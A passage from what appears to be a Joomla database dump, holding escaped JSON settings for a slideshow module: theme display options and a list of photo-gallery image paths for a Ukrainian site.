state_image_height\\\":\\\"320\\\",\\\"gk_musicstate_image_bg\\\":\\\"#000000\\\",\\\"gk_musicstate_quality\\\":\\\"95\\\",\\\"gk_musicstate_show_title_block\\\":\\\"1\\\",\\\"gk_musicstate_title_block_color\\\":\\\"#fff\\\",\\\"gk_musicstate_slide_links\\\":\\\"1\\\",\\\"gk_musicstate_animation_speed\\\":\\\"500\\\",\\\"gk_musicstate_animation_interval\\\":\\\"5000\\\",\\\"gk_musicstate_autoanimation\\\":\\\"1\\\"},\\\"gk_photo\\\":{\\\"gk_photo_module_height_desktop\\\":\\\"700\\\",\\\"gk_photo_module_height_tablet\\\":\\\"500\\\",\\\"gk_photo_module_height_mobile\\\":\\\"300\\\",\\\"gk_photo_image_width\\\":\\\"640\\\",\\\"gk_photo_image_height\\\":\\\"320\\\",\\\"gk_photo_image_bg\\\":\\\"#000000\\\",\\\"gk_photo_quality\\\":\\\"95\\\",\\\"gk_photo_dark_theme\\\":\\\"0\\\",\\\"gk_photo_show_title_block\\\":\\\"1\\\",\\\"gk_photo_show_pagination\\\":\\\"1\\\",\\\"gk_photo_animation_speed\\\":\\\"500\\\",\\\"gk_photo_animation_interval\\\":\\\"5000\\\",\\\"gk_photo_autoanimation\\\":\\\"1\\\"},\\\"gk_publisher\\\":{\\\"gk_publisher_image_width\\\":\\\"640\\\",\\\"gk_publisher_image_height\\\":\\\"320\\\",\\\"gk_publisher_image_bg\\\":\\\"#000000\\\",\\\"gk_publisher_quality\\\":\\\"95\\\",\\\"gk_publisher_title_block_position\\\":\\\"bottom\\\",\\\"gk_publisher_show_content_block\\\":\\\"1\\\",\\\"gk_publisher_show_title_block\\\":\\\"1\\\",\\\"gk_publisher_show_text_block\\\":\\\"1\\\",\\\"gk_publisher_title_block_length\\\":\\\"30\\\",\\\"gk_publisher_text_block_length\\\":\\\"80\\\",\\\"gk_publisher_pagination\\\":\\\"1\\\",\\\"gk_publisher_pagination_position\\\":\\\"bottom\\\",\\\"gk_publisher_slide_links\\\":\\\"1\\\",\\\"gk_publisher_animation_speed\\\":\\\"500\\\",\\\"gk_publisher_animation_interval\\\":\\\"5000\\\",\\\"gk_publisher_autoanimation\\\":\\\"1\\\"},\\\"gk_quark\\\":{\\\"gk_quark_module_height_desktop\\\":\\\"700\\\",\\\"gk_quark_module_height_tablet\\\":\\\"500\\\",\\\"gk_quark_module_height_mobile\\\":\\\"300\\\",\\\"gk_quark_show_pagination\\\":\\\"1\\\",\\\"gk_quark_show_slider\\\":\\\"1\\\",\\\"gk_quark_show_preview\\\":\\\"0\\\",\\\"gk_quark_image_width\\\":\\\"640\\\",\\\"gk_quark_image_height\\\":\\\"320\\\",\\\"gk_quark_image_bg\\\":\\\"#000000\\\",\\\"gk_quark_quality\\\":\\\"95\\\",\\\"gk_quark_animation_interval\\\":\\\"5000\\\",\\\"gk_quark_autoanimation\\\":\\\"1\\\"},\\\"gk_rockwall\\\":{\\\"gk_rockwall_image_width\\\":\\\"640\\\",\\\"gk_rockwall_image_height\\\":\\\"320\\\",\\\"gk_rockwall_image_bg\\\":\\\"#87CEFA\\\",\\\"gk_rockwall_quality\\\":\\\"95\\\",\\\"gk_rockwall_show_title_block\\\":\\\"1\\\",\\\"gk_rockwall_title_block_bg\\\":\\\"transparent\\\",\\\"gk_rockwall_title_block_color\\\":\\\"#87CEFA\\\",\\\"gk_rockwall_title_block_position\\\":\\\"left\\\",\\\"gk_rockwall_title_block_padding\\\":\\\"\\\",\\\"gk_rockwall_title_block_width\\\":\\\"\\\",\\\"gk_rockwall_slide_links\\\":\\\"1\\\",\\\"gk_rockwall_animation_speed\\\":\\\"500\\\",\\\"gk_rockwall_animation_interval\\\":\\\"5000\\\",\\\"gk_rockwall_autoanimation\\\":\\\"1\\\"},\\\"gk_shop_and_buy\\\":{\\\"gk_shop_and_buy_image_width\\\":\\\"640\\\",\\\"gk_shop_and_buy_image_height\\\":\\\"320\\\",\\\"gk_shop_and_buy_image_bg\\\":\\\"#000000\\\",\\\"gk_shop_and_buy_quality\\\":\\\"95\\\",\\\"gk_shop_and_buy_show_content_block\\\":\\\"1\\\",\\\"gk_shop_and_buy_show_title_block\\\":\\\"1\\\",\\\"gk_shop_and_buy_show_text_block\\\":\\\"1\\\",\\\"gk_shop_and_buy_title_block_length\\\":\\\"30\\\",\\\"gk_shop_and_buy_text_block_length\\\":\\\"80\\\",\\\"gk_shop_and_buy_pagination\\\":\\\"1\\\",\\\"gk_shop_and_buy_pagination_arrows\\\":\\\"1\\\",\\\"gk_shop_and_buy_slide_links\\\":\\\"1\\\",\\\"gk_shop_and_buy_animation_speed\\\":\\\"1000\\\",\\\"gk_shop_and_buy_animation_interval\\\":\\\"6000\\\",\\\"gk_shop_and_buy_autoanimation\\\":\\\"1\\\"},\\\"gk_startup\\\":{\\\"gk_startup_image_bg\\\":\\\"transparent\\\",\\\"gk_startup_quality\\\":\\\"95\\\",\\\"gk_startup_desktop_width\\\":\\\"1000\\\",\\\"gk_startup_image_width\\\":\\\"804\\\",\\\"gk_startup_module_height\\\":\\\"920\\\",\\\"gk_startup_tablet_width\\\":\\\"920\\\",\\\"gk_startup_tablet_image_width\\\":\\\"603\\\",\\\"gk_startup_tablet_module_height\\\":\\\"690\\\",\\\"gk_startup_mobile_width\\\":\\\"580\\\",\\\"gk_startup_mobile_image_width\\\":\\\"338\\\",\\\"gk_startup_mobile_module_height\\\":\\\"386\\\",\\\"gk_startup_pagination\\\":\\\"1\\\",\\\"gk_startup_arrows\\\":\\\"1\\\",\\\"gk_startup_slide_links\\\":\\\"1\\\",\\\"gk_startup_animation_speed\\\":\\\"500\\\",\\\"gk_startup_animation_interval\\\":\\\"5000\\\",\\\"gk_startup_autoanimation\\\":\\\"1\\\"},\\\"gk_storebox\\\":{\\\"gk_storebox_image_width\\\":\\\"640\\\",\\\"gk_storebox_image_height\\\":\\\"320\\\",\\\"gk_storebox_image_bg\\\":\\\"#000000\\\",\\\"gk_storebox_quality\\\":\\\"95\\\",\\\"gk_storebox_show_title_block\\\":\\\"1\\\",\\\"gk_storebox_title_block_bg\\\":\\\"transparent\\\",\\\"gk_storebox_title_block_color\\\":\\\"#fff\\\",\\\"gk_storebox_title_block_position_y\\\":\\\"30\\\",\\\"gk_storebox_title_block_position_x\\\":\\\"30\\\",\\\"gk_storebox_pagination\\\":\\\"1\\\",\\\"gk_storebox_slide_links\\\":\\\"1\\\",\\\"gk_storebox_animation_speed\\\":\\\"500\\\",\\\"gk_storebox_animation_interval\\\":\\\"5000\\\",\\\"gk_storebox_autoanimation\\\":\\\"1\\\"},\\\"gk_storefront\\\":{\\\"gk_storefront_module_height_desktop\\\":\\\"700\\\",\\\"gk_storefront_module_height_tablet\\\":\\\"500\\\",\\\"gk_storefront_module_height_mobile\\\":\\\"300\\\",\\\"gk_storefront_image_width\\\":\\\"640\\\",\\\"gk_storefront_image_height\\\":\\\"320\\\",\\\"gk_storefront_image_bg\\\":\\\"#000000\\\",\\\"gk_storefront_quality\\\":\\\"95\\\",\\\"gk_storefront_show_title_block\\\":\\\"1\\\",\\\"gk_storefront_show_pagination\\\":\\\"1\\\",\\\"gk_storefront_slide_links\\\":\\\"1\\\",\\\"gk_storefront_animation_speed\\\":\\\"500\\\",\\\"gk_storefront_animation_interval\\\":\\\"5000\\\",\\\"gk_storefront_autoanimation\\\":\\\"1\\\"},\\\"gk_university\\\":{\\\"gk_university_image_width\\\":\\\"1720\\\",\\\"gk_university_image_height\\\":\\\"896\\\",\\\"gk_university_tablet_image_width\\\":\\\"1040\\\",\\\"gk_university_tablet_image_height\\\":\\\"542\\\",\\\"gk_university_mobile_image_width\\\":\\\"640\\\",\\\"gk_university_mobile_image_height\\\":\\\"334\\\",\\\"gk_university_image_bg\\\":\\\"#000000\\\",\\\"gk_university_quality\\\":\\\"95\\\",\\\"gk_university_show_title_block\\\":\\\"1\\\",\\\"gk_university_animation_loop\\\":\\\"1\\\",\\\"gk_university_slide_links\\\":\\\"1\\\",\\\"gk_university_animation_speed\\\":\\\"500\\\",\\\"gk_university_animation_interval\\\":\\\"5000\\\"}}\",\"memory_limit\":\"128M\",\"generate_thumbnails\":\"1\",\"random_slides\":\"0\",\"use_style_css\":\"1\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\",\"exclude_content\":\"0\"}',0,'*'),(159,2460,'Слайди - фотогалерея','','',1,'breadcrumb',0,'0000-00-00 00:00:00','2020-08-30 07:42:41','0000-00-00 00:00:00',0,'mod_image_show_gk4',1,0,'{\"automatic_module_id\":\"1\",\"module_id\":\"gk-is-1\",\"moduleclass_sfx\":\"\",\"module_style\":\"gk_fashion\",\"last_modification\":\"1598787429\",\"image_show_data\":\"[{\\\"name\\\":\\\"\\\",\\\"alt\\\":\\\"\\\",\\\"type\\\":\\\"text\\\",\\\"image\\\":\\\"images\\/stories\\/fotogaleri\\/malyn_nash000002.jpg\\\",\\\"stretch\\\":\\\"nostretch\\\",\\\"access\\\":\\\"public\\\",\\\"published\\\":\\\"1\\\",\\\"content\\\":\\\"\\\",\\\"url\\\":\\\"\\\",\\\"art_id\\\":\\\"\\\",\\\"art_title\\\":\\\"\\\",\\\"artK2_id\\\":\\\"\\\",\\\"artK2_title\\\":\\\"\\\"},{\\\"name\\\":\\\"\\\",\\\"alt\\\":\\\"\\\",\\\"type\\\":\\\"text\\\",\\\"image\\\":\\\"images\\/stories\\/fotogaleri\\/malyn_nash000003.jpg\\\",\\\"stretch\\\":\\\"nostretch\\\",\\\"access\\\":\\\"public\\\",\\\"published\\\":\\\"1\\\",\\\"content\\\":\\\"\\\",\\\"url\\\":\\\"\\\",\\\"art_id\\\":\\\"\\\",\\\"art_title\\\":\\\"\\\",\\\"artK2_id\\\":\\\"\\\",\\\"artK2_title\\\":\\\"\\\"},{\\\"name\\\":\\\"\\\",\\\"alt\\\":\\\"\\\",\\\"type\\\":\\\"text\\\",\\\"image\\\":\\\"images\\/stories\\/fotogaleri\\/malyn_nash000004.jpg\\\",\\\"stretch\\\":\\\"nostretch\\\",\\\"access\\\":\\\"public\\\",\\\"published\\\":\\\"1\\\",\\\"content\\\":\\\"\\\",\\\"url\\\":\\\"\\\",\\\"art_id\\\":\\\"\\\",\\\"art_title\\\":\\\"\\\",\\\"artK2_id\\\":\\\"\\\",\\\"artK2_title\\\":\\\"\\\"},{\\\"name\\\":\\\"\\\",\\\"alt\\\":\\\"\\\",\\\"type\\\":\\\"text\\\",\\\"image\\\":\\\"images\\/stories\\/fotogaleri\\/malyn_nash000005.jpg\\\",\\\"stretch\\\":\\\"nostretch\\\",\\\"access\\\":\\\"public\\\",\\\"published\\\":\\\"1\\\",\\\"content\\\":\\\"\\\",\\\"url\\\":\\\"\\\",\\\"art_id\\\":\\\"\\\",\\\"art_title\\\":\\\"\\\",\\\"artK2_id\\\":\\\"\\\",\\\"artK2_title\\\":\\\"\\\"},{\\\"name\\\":\\\"\\\",\\\"alt\\\":\\\"\\\",\\\"type\\\":\\\"text\\\",\\\"image\\\":\\\"images\\/stories\\/fotogaleri\\/malyn_nash000006.jpg\\\",\\\"stretch\\\":\\\"nostretch\\\",\\\"access\\\":\\\"public\\\",\\\"published\\\":\\\"1\\\",\\\"content\\\":\\\"\\\",\\\"url\\\":\\\"\\\",\\\"art_id\\\":\\\"\\\",\\\"art_title\\\":\\\"\\\",\\\"artK2_id\\\":\\\"\\\",\\\"artK2_title\\\":\\\"\\\"},{\\\"name\\\":\\\"\\\",\\\"alt\\\":\\\"\\\",\\\"type\\\":\\\"text\\\",\\\"image\\\":\\\"images\\/stories\\/fotogaleri\\/malyn_nash000007.jpg\\\",\\\"stretch\\\":\\\"nostretch\\\",\\\"access\\\":\\\"public\\\",\\\"published\\\":\\\"1\\\",\\\"content\\\":\\\"\\\",\\\"url\\\":\\\"\\\",\\\"art_id\\\":\\\"\\\",\\\"art_title\\\":\\\"\\\",\\\"artK2_id\\\":\\\"\\\",\\\"artK2_title\\\":\\\"\\\"},{\\\"name\\\":\\\"\\\",\\\"alt\\\":\\\"\\\",\\\"type\\\":\\\"text\\\",\\\"image\\\":\\\"images\\/stories\\/fotogaleri\\/malyn_nash000008.jpg\\\",\\\"stretch\\\":\\\"nostretch\\\",\\\"access\\\":\\\"public\\\",\\\"published\\\":\\\"1\\\",\\\"content\\\":\\\"\\\",\\\"url\\\":\\\"\\\",\\\"art_id\\\":\\\"\\\",\\\"art_title\\\":\\\"\\\",\\\"artK2_id\\\":\\\"\\\",\\\"artK2_title\\\":\\\"\\\"},{\\\"name\\\":\\\"\\\",\\\"alt\\\":\\\"\\\",\\\"type\\\":\\\"text\\\",\\\"image\\\":\\\"images\\/stories\\/fotogaleri\\/malyn_nash000009.JPG\\\",\\\"stretch\\\":\\\"nostretch\\\",\\\"access\\\":\\\"public\\\",\\\"published\\\":\\\"1\\\",\\\"content\\\":\\\"\\\",\\\"url\\\":\\\"\\\",\\\"art_id\\\":\\\"\\\",\\\"art_title\\\":\\\"\\\",\\\"artK2_id\\\":\\\"\\\",\\\"artK2_title\\\":\\\"\\\"},{\\\"name\\\":\\\"\\\",\\\"alt\\\":\\\"\\\",\\\"type\\\":\\\"text\\\",\\\"image\\\":\\\"images\\/stories\\/fotogaleri\\/malyn_nash000010.JPG\\\",\\\"stretch\\\":\\\"nostretch\\\",\\\"access\\\":\\\"public\\\",\\\"published\\\":\\\"1\\\",\\\"content\\\":\\\"\\\",\\\"url\\\":\\\"\\\",\\\"art_id\\\":\\\"\\\",\\\"art_title\\\":\\\"\\\",\\\"artK2_id\\\":\\\"\\\",\\\"artK2_title\\\":\\\"\\\"},{\\\"name\\\":\\\"\\\",\\\"alt\\\":\\\"\\\",\\\"type\\\":\\\"text\\\",\\\"image\\\":\\\"images\\/stories\\/fotogaleri\\/malyn_nash000011.JPG\\\",\\\"stretch\\\":\\\"nostretch\\\",\\\"access\\\":\\\"public\\\",\\\"published\\\":\\\"1\\\",\\\"content\\\":\\\"\\\",\\\"url\\\":\\\"\\\",\\\"art_id\\\":\\\"\\\",\\\"art_title\\\":\\\"\\\",\\\"artK2_id\\\":\\\"\\\",\\\"artK2_title\\\":\\\"\\\"},{\\\"name\\\":\\\"\\\",\\\"alt\\\":\\\"\\\",\\\"type\\\":\\\"text\\\",\\\"image\\\":\\\"images\\/stories\\/fotogaleri\\/malyn_nash000012.JPG\\\",\\\"stretch\\\":\\\"nostretch\\\",\\\"access\\\":\\\"public\\\",\\\"published\\\":\\\"1\\\",\\\"content\\\":\\\"\\\",\\\"url\\\":\\\"\\\",\\\"art_id\\\":\\\"\\\",\\\"art_title\\\":\\\"\\\",\\\"artK2_id\\\":\\\"\\\",\\\"artK2_title\\\":\\\"\\\"},{\\\"name\\\":\\\"\\\",\\\"alt\\\":\\\"\\\",\\\"type\\\":\\\"text\\\",\\\"image\\\":\\\"images\\/stories\\/fotogaleri\\/malyn_nash000013.JPG\\\",\\\"stretch\\\":\\\"nostretch\\\",\\\"access\\\":\\\"public\\\",\\\"published\\\":\\\"1\\\",\\\"content\\\":\\\"\\\",\\\"url\\\":\\\"\\\",\\\"art_id\\\":\\\"\\\",\\\"art_title\\\":\\\"\\\",\\\"artK2_id\\\":\\\"\\\",\\\"artK2_title\\\":\\\"\\\"},{\\\"name\\\":\\\"\\\",\\\"alt\\\":\\\"\\\",\\\"type\\\":\\\"text\\\",\\\"image\\\":\\\"images\\/stories\\/fotogaleri\\/malyn_nash000014.JPG\\\",\\\"stretch\\\":\\\"nostretch\\\",\\\"access\\\":\\\"public\\\",\\\"published\\\":\\\"1\\\",\\\"content\\\":\\\"\\\",\\\"url\\\":\\\"\\\",\\\"art_id\\\":\\\"\\\",\\\"art_title\\\":\\\"\\\",\\\"artK2_id\\\":\\\"\\\",\\\"artK2_title\\\":\\\"\\\"},{\\\"name\\\":\\\"\\\",\\\"alt\\\":\\\"\\\",\\\"type\\\":\\\"text\\\",\\\"image\\\":\\\"images\\/stories\\/fotogaleri\\/malyn_nash000015.JPG\\\",\\\"stretch\\\":\\\"nostretch\\\",\\\"access\\\":\\\"public\\\",\\\"published\\\":\\\"1\\\",\\\"content\\\":\\\"\\\",\\\"url\\\":\\\"\\\",\\\"art_id\\\":\\\"\\\",\\\"art_title\\\":\\\"\\\",\\\"artK2_id\\\":\\\"\\\",\\\"artK2_title\\\":\\\"\\\"},{\\\"name\\\":\\\"\\\",\\\"alt\\\":\\\"\\\",\\\"type\\\":\\\"text\\\",\\\"image\\\":\\\"images\\/stories\\/fotogaleri\\/malyn_nash000017.jpg\\\",\\\"stretch\\\":\\\"nostretch\\\",\\\"access\\\":\\\"public\\\",\\\"published\\\":\\\"1\\\",\\\"content\\\":\\\"\\\",\\\"url\\\":\\\"\\\",\\\"art_id\\\":\\\"\\\",\\\"art_title\\\":\\\"\\\",\\\"artK2_id\\\":\\\"\\\",\\\"artK2_title\\\":\\\"\\\"},{\\\"name\\\":\\\"\\\",\\\"alt\\\":\\\"\\\",\\\"type\\\":\\\"text\\\",\\\"image\\\":\\\"images\\/stories\\/fotogaleri\\/malyn_nash000018.jpg\\\",\\\"stretch\\\":\\\"nostretch\\\",\\\"access\\\":\\\"public\\\",\\\"published\\\":\\\"1\\\",\\\"content\\\":\\\"\\\",\\\"url\\\":\\\"\\\",\\\"art_id\\\":\\\"\\\",\\\"art_title\\\":\\\"\\\",\\\"artK2_id\\\":\\\"\\\",\\\"artK2_title\\\":\\\"\\\"},{\\\"name\\\":\\\"\\\",\\\"alt\\\":\\\"\\\",\\\"type\\\":\\\"text\\\",\\\"image\\\":\\\"images\\/stories\\/fotogaleri\\/malyn_nash000019.jpg\\\",\\\"stretch\\\":\\\"nostretch\\\",\\\"access\\\":\\\"public\\\",\\\"published\\\":\\\"1\\\",\\\"content\\\":\\\"\\\",\\\"url\\\":\\\"\\\",\\\"art_id\\\":\\\"\\\",\\\"art_title\\\":\\\"\\\",\\\"artK2_id\\\":\\\"\\\",\\\"artK2_title\\\":\\\"\\\"},{\\\"name\\\":\\\"\\\",\\\"alt\\\":\\\"\\\",\\\"type\\\":\\\"text\\\",\\\"image\\\":\\\"images\\/stories\\/fotogaleri\\/malyn_nash000020.jpg\\\",\\\"stretch\\\":\\\"nostretch\\\",\\\"access\\\":\\\"public\\\",\\\"published\\\":\\\"1\\\",\\\"content\\\":\\\"\\\",\\\"url\\\":\\\"\\\",\\\"art_id\\\":\\\"\\\",\\\"art_title\\\":\\\"\\\",\\\"artK2_id\\\":\\\"\\\",\\\"artK2_title\\\":\\\"\\\"},{\\\"name\\\":\\\"\\\",\\\"alt\\\":\\\"\\\",\\\"type\\\":\\\"text\\\",\\\"image\\\":\\\"images\\/stories\\/fotogaleri\\/malyn_nash000021.jpg\\\",\\\"stretch\\\":\\\"nostretch\\\",\\\"access\\\":\\\"public\\\",\\\"published\\\":\\\"1\\\",\\\"content\\\":\\\"\\\",\\\"url\\\":\\\"\\\",\\\"art_id\\\":\\\"\\\",\\\"art_title\\\":\\\"\\\",\\\"artK2_id\\\":\\\"\\\",\\\"artK2_title\\\":\\\"\\\"},{\\\"name\\\":\\\"\\\",\\\"alt\\\":\\\"\\\",\\\"type\\\":\\\"text\\\",\\\"image\\\":\\\"images\\/stories\\/fotogaleri\\/malyn_nash000023.jpg\\\",\\\"stretch\\\":\\\"nostretch\\\",\\\"access\\\":\\\"public\\\",\\\"published\\\":\\\"1\\\",\\\"content\\\":\\\"\\\",\\\"url\\\":\\\"\\\",\\\"art_id\\\":\\\"\\\",\\\"art_title\\\":\\\"\\\",\\\"artK2_id\\\":\\\"\\\",\\\"artK2_title\\\":\\\"\\\"},{\\\"name\\\":\\\"\\\",\\\"alt\\\":\\\"\\\",\\\"type\\\":\\\"text\\\",\\\"image\\\":\\\"images\\/stories\\/fotogaleri\\/malyn_nash000024.jpg\\\",\\\"stretch\\\":\\\"nostretch\\\",\\\"access\\\":\\\"public\\\",\\\"published\\\":\\\"1\\\",\\\"content\\\":\\\"\\\",\\\"url\\\":\\\"\\\",\\\"art_id\\\":\\\"\\\",\\\"art_title\\\":\\\"\\\",\\\"artK2_id\\\":\\\"\\\",\\\"artK2_title\\\":\\\"\\\"},{\\\"name\\\":\\\"\\\",\\\"alt\\\":\\\"\\\",\\\"type\\\":\\\"text\\\",\\\"image\\\":\\\"images\\/stories\\/fotogaleri\\/malyn_nash000026.jpg\\\",\\\"stretch\\\":\\\"nostretch\\\",\\\"access\\\":\\\"public\\\",\\\"published\\\":\\\"1\\\",\\\"content\\\":\\\"\\\",\\\"url\\\":\\\"\\\",\\\"art_id\\\":\\\"\\\",\\\"art_title\\\":\\\"\\\",\\\"artK2_id\\\":\\\"\\\",\\\"artK2_title\\\":\\\"\\\"},{\\\"name\\\":\\\"\\\",\\\"alt\\\":\\\"\\\",\\\"type\\\":\\\"text\\\",\\\"image\\\":\\\"images\\/stories\\/fotogaleri\\/malyn_nash000029.jpg\\\",\\\"stretch\\\":\\\"nostretch\\\",\\\"access\\\":\\\"public\\\",\\\"published\\\":\\\"1\\\",\\\"content\\\":\\\"\\\",\\\"url\\\":\\\"\\\",\\\"art_id\\\":\\\"\\\",\\\"art_title\\\":\\\"\\\",\\\"artK2_id\\\":\\\"\\\",\\\"artK2_title\\\":\\\"\\\"},{\\\"name\\\":\\\"\\\",\\\"alt\\\":\\\"\\\",\\\"type\\\":\\\"text\\\",\\\"image\\\":\\\"images\\/stories\\/fotogaleri\\/malyn_nash000031.jpg\\\",\\\"stretch\\\":\\\"nostretch\\\",\\\"access\\\":\\\"public\\\",\\\"published\\\":\\\"1\\\",\\\"content\\\":\\\"\\\",\\\"url\\\":\\\"\\\",\\\"art_id\\\":\\\"\\\",\\\"art_title\\\":\\\"\\\",\\\"artK2_id\\\":\\\"\\\",\\\"artK2_title\\\":\\\"\\\"},{\\\"name\\\":\\\"\\\",\\\"alt\\\":\\\"\\\",\\\"type\\\":\\\"text\\\",\\\"image\\\":\\\"images\\/stories\\/fotogaleri\\/malyn_nash000032.jpg\\\",\\\"stretch\\\":\\\"nostretch\\\",\\\"access\\\":\\\"public\\\",\\\"published\\\":\\\"1\\\",\\\"content\\\":\\\"\\\",\\\"url\\\":\\\"\\\",\\\"art_id\\\":\\\"\\\",\\\"art_title\\\":\\\"\\\",\\\"artK2_id\\\":\\\"\\\",\\\"artK2_title\\\":\\\"\\\"},{\\\"name\\\":\\\"\\\",\\\"alt\\\":\\\"\\\",\\\"type\\\":\\\"text\\\",\\\"image\\\":\\\"images\\/stories\\/fotogaleri\\/malyn_nash000033.jpg\\\",\\\"stretch\\\":\\\"nostretch\\\",\\\"access\\\":\\\"public\\\",\\\"published\\\":\\\"1\\\",\\\"content\\\":\\\"\\\",\\\"url\\\":\\\"\\\",\\\"art_id\\\":\\\"\\\",\\\"art_title\\\":\\\"\\\",\\\"artK2_id\\\":\\\"\\\",\\\"artK2_title\\\":\\\"\\\"},{\\\"name\\\":\\\"\\\",\\\"alt\\\":\\\"\\\",\\\"type\\\":\\\"text\\\",\\\"image\\\":\\\"images\\/stories\\/fotogaleri\\/malyn_nash000034.jpg\\\",\\\"stretch\\\":\\\"nostretch\\\",\\\"access\\\":\\\"public\\\",\\\"published\\\":\\\"1\\\",\\\"content\\\":\\\"\\\",\\\"url\\\":\\\"\\\",\\\"art_id\\\":\\\"\\\",\\\"art_title\\\":\\\"\\\",\\\"artK2_id\\\":\\\"\\\",\\\"artK2_title\\\":\\\"\\\"},{\\\"name\\\":\\\"\\\",\\\"alt\\\":\\\"\\\",\\\"type\\\":\\\"text\\\",\\\"image\\\":\\\"images\\/stories\\/fotogaleri\\/malyn_nash000035.jpg\\\",\\\"stretch\\\":\\\"nostretch\\\",\\\"access\\\":\\\"public\\\",\\\"published\\\":\\\"1\\\",\\\"content\\\":\\\"\\\",\\\"url\\\":\\\"\\\",\\\"art_id\\\":\\\"\\\",\\\"art_title\\\":\\\"\\\",\\\"artK2_id\\\":\\\"\\\",\\\"artK2_title\\\":\\\"\\\"}]\",\"config\":\"{\\\"gk_bikestore\\\":{\\\"gk_bikestore_image_width\\\":\\\"640\\\",\\\"gk_bikestore_image_height\\\":\\\"480\\\",\\\"gk_bikestore_image_bg\\\":\\\"#D3D3D3\\\",\\\"gk_bikestore_quality\\\":\\\"100\\\",\\\"gk_bikestore_show_title_block\\\":\\\"1\\\",\\\"gk_bikestore_title_block_position\\\":\\\"bottom\\\",\\\"gk_bikestore_title_block_position_x\\\":\\\"left\\\",\\\"gk_bikestore_title_block_length\\\":\\\"30\\\",\\\"gk_bikestore_pagination\\\":\\\"1\\\",\\\"gk_bikestore_pagination_position\\\":\\\"top\\\",\\\"gk_bikestore_slide_links\\\":\\\"1\\\",\\\"gk_bikestore_animation_speed\\\":\\\"500\\\",\\\"gk_bikestore_animation_interval\\\":\\\"5000\\\",\\\"gk_bikestore_autoanimation\\\":\\\"1\\\"},\\\"gk_bluap\\\":{\\\"gk_bluap_image_width\\\":\\\"640\\\",\\\"gk_bluap_image_height\\\":\\\"320\\\",\\\"gk_bluap_image_bg\\\":\\\"#000000\\\",\\\"gk_bluap_quality\\\":\\\"95\\\",\\\"gk_bluap_text_block_width\\\":\\\"50\\\",\\\"gk_bluap_text_block_position\\\":\\\"left\\\",\\\"gk_bluap_pagination\\\":\\\"1\\\",\\\"gk_bluap_animation_speed\\\":\\\"500\\\",\\\"gk_bluap_animation_interval\\\":\\\"5000\\\",\\\"gk_bluap_autoanimation\\\":\\\"1\\\"},\\\"gk_box\\\":{\\\"gk_box_image_width\\\":\\\"780\\\",\\\"gk_box_image_height\\\":\\\"860\\\",\\\"gk_box_thumb_width\\\":\\\"80\\\",\\\"gk_box_thumb_height\\\":\\\"92\\\",\\\"gk_box_image_bg\\\":\\\"#ffffff\\\",\\\"gk_box_quality\\\":\\\"95\\\",\\\"gk_box_show_text_block\\\":\\\"1\\\",\\\"gk_box_text_block_length\\\":\\\"80\\\",\\\"gk_box_pagination\\\":\\\"1\\\",\\\"gk_box_slide_links\\\":\\\"1\\\",\\\"gk_box_animation_speed\\\":\\\"500\\\",\\\"gk_box_animation_interval\\\":\\\"5000\\\",\\\"gk_box_autoanimation\\\":\\\"1\\\"},\\\"gk_creativity\\\":{\\\"gk_creativity_image_width\\\":\\\"640\\\",\\\"gk_creativity_image_height\\\":\\\"320\\\",\\\"gk_creativity_image_bg\\\":\\\"#000000\\\",\\\"gk_creativity_quality\\\":\\\"95\\\",\\\"gk_creativity_title_anim\\\":\\\"none\\\",\\\"gk_creativity_text_anim\\\":\\\"none\\\",\\\"gk_creativity_bganim\\\":\\\"opacity\\\",\\\"gk_creativity_pagination\\\":\\\"1\\\",\\\"gk_creativity_animation_speed\\\":\\\"500\\\",\\\"gk_creativity_animation_interval\\\":\\\"5000\\\",\\\"gk_creativity_autoanimation\\\":\\\"1\\\"},\\\"gk_fashion\\\":{\\\"gk_fashion_image_width\\\":\\\"640\\\",\\\"gk_fashion_image_height\\\":\\\"480\\\",\\\"gk_fashion_image_bg\\\":\\\"#000000\\\",\\\"gk_fashion_quality\\\":\\\"100\\\",\\\"gk_fashion_show_title_block\\\":\\\"1\\\",\\\"gk_fashion_title_block_position\\\":\\\"bottom\\\",\\\"gk_fashion_title_block_length\\\":\\\"30\\\",\\\"gk_fashion_pagination\\\":\\\"1\\\",\\\"gk_fashion_pagination_position\\\":\\\"top\\\",\\\"gk_fashion_slide_links\\\":\\\"1\\\",\\\"gk_fashion_animation_speed\\\":\\\"500\\\",\\\"gk_fashion_animation_interval\\\":\\\"5000\\\",\\\"gk_fashion_autoanimation\\\":\\\"1\\\"},\\\"gk_game\\\":{\\\"gk_game_image_width\\\":\\\"2080\\\",\\\"gk_game_image_height\\\":\\\"936\\\",\\\"gk_game_margin_bottom\\\":\\\"430\\\",\\\"gk_game_tablet_image_width\\\":\\\"1040\\\",\\\"gk_game_tablet_image_height\\\":\\\"468\\\",\\\"gk_game_tablet_margin_bottom\\\":\\\"215\\\",\\\"gk_game_mobile_image_width\\\":\\\"570\\\",\\\"gk_game_mobile_image_height\\\":\\\"234\\\",\\\"gk_game_mobile_margin_bottom\\\":\\\"107\\\",\\\"gk_game_image_bg\\\":\\\"#000000\\\",\\\"gk_game_quality\\\":\\\"95\\\",\\\"gk_game_show_title_block\\\":\\\"1\\\",\\\"gk_game_animation_loop\\\":\\\"1\\\",\\\"gk_game_slide_links\\\":\\\"1\\\",\\\"gk_game_animation_speed\\\":\\\"500\\\",\\\"gk_game_animation_interval\\\":\\\"5000\\\"},\\\"gk_hotel_tabs\\\":{\\\"gk_hotel_tabs_image_width\\\":\\\"2000\\\",\\\"gk_hotel_tabs_image_height\\\":\\\"720\\\",\\\"gk_hotel_tabs_tablet_image_width\\\":\\\"1040\\\",\\\"gk_hotel_tabs_tablet_image_height\\\":\\\"720\\\",\\\"gk_hotel_tabs_mobile_image_width\\\":\\\"640\\\",\\\"gk_hotel_tabs_mobile_image_height\\\":\\\"540\\\",\\\"gk_hotel_tabs_image_bg\\\":\\\"#000000\\\",\\\"gk_hotel_tabs_quality\\\":\\\"95\\\",\\\"gk_hotel_tabs_mode\\\":\\\"slideshow\\\",\\\"gk_hotel_tabs_show_title_block\\\":\\\"1\\\",\\\"gk_hotel_tabs_show_button\\\":\\\"1\\\",\\\"gk_hotel_tabs_prev_next\\\":\\\"0\\\",\\\"gk_hotel_tabs_pagination\\\":\\\"disabled\\\",\\\"gk_hotel_tabs_animation_loop\\\":\\\"1\\\",\\\"gk_hotel_tabs_slide_links\\\":\\\"1\\\",\\\"gk_hotel_tabs_animation_speed\\\":\\\"500\\\",\\\"gk_hotel_tabs_animation_interval\\\":\\\"5000\\\"},\\\"gk_musicstat